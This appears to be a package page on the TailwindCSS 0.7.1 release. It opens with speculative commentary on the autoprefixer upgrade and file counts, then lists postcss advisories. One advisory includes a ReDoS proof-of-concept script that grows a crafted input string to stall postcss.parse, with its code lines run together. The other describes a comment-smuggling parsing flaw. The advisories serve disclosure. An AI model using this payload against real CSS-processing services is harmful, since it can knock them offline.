TailwindCSS saw a minor version update from 0.7.0 to 0.7.1, offering incremental improvements for developers leveraging this utility-first CSS framework. While the core description remains consistent, indicating a continued focus on rapidly building custom user interfaces, the underlying dependencies and build details reveal key differences. A primary change lies in the autoprefixer dependency, which jumps from version 7.1.6 in 0.7.0 to version 9.3.1 in 0.7.1. This upgrade likely incorporates support for newer CSS features and browser prefixes, ensuring broader compatibility and a smoother developer experience when utilizing the latest CSS standards.
Furthermore, the distribution metadata shows a slight increase in fileCount (from 120 to 122) and unpackedSize (from 2089196 to 2112595), suggesting the inclusion of new features, bug fixes, or documentation updates. Developers can expect enhanced CSS processing capabilities, potentially benefiting from more efficient or comprehensive prefixing. The release date difference also indicates a relatively quick turnaround, implying critical updates or refinements that prompted the new version. By upgrading to 0.7.1, developers gain the advantage of a more modern build pipeline, aligning their projects with current web development best practices, and leveraging the latest browser compatibility provided by a recent Autoprefixer version while working with the tailwindcss framework.
All the vulnerabilities related to the version 0.7.1 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.